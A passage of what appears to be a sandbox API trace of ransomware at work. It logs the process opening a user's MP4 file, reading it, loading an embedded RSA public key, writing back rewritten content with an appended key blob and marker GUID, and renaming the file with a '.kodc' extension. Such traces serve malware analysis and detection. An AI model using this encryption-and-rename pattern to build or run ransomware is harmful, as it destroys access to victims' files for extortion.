dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QwwxKA1eF4.mp4", cAlternateFileName="QWWXKA~1.MP4")) returned 1 [0100.397] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QwwxKA1eF4.mp4") returned=".mp4" [0100.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QwwxKA1eF4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qwwxka1ef4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.397] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=99619) returned 1 [0100.397] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.401] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x184fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.401] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.402] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.402] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x18523, lpOverlapped=0x0) returned 1 [0100.403] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.403] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.403] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.403] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.405] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.405] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.405] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.405] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.405] GetLastError () returned 0x0 [0100.405] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.405] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.405] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.405] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.405] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18520) returned 0x9bb8968 [0100.406] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c658 [0100.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c80 [0100.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c6a0 [0100.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c98 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cc8 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ce0 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.407] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cc8 | out: hHeap=0x630000) returned 1 [0100.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ce0 | out: hHeap=0x630000) returned 1 [0100.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ce0 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7cc8 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ce0 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cc8 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.408] GetCurrentThreadId () returned 0x42c [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6c08 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.409] GetCurrentThreadId () returned 0x42c [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cc8 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ce0 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cb0 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7cf8 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cc8 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cc8 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cc8 | out: hHeap=0x630000) returned 1 [0100.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cf8 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ce0 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cb0 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c98 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c6a0 | out: hHeap=0x630000) returned 1 [0100.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.413] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x1851e, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x1851e, lpOverlapped=0x0) returned 1 [0100.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.414] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18523, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.414] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.414] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.414] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.414] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.414] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.414] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.414] CloseHandle (hObject=0x5cc) returned 1 [0100.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0100.428] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QwwxKA1eF4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qwwxka1ef4.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QwwxKA1eF4.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qwwxka1ef4.mp4.kodc")) returned 1 [0100.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 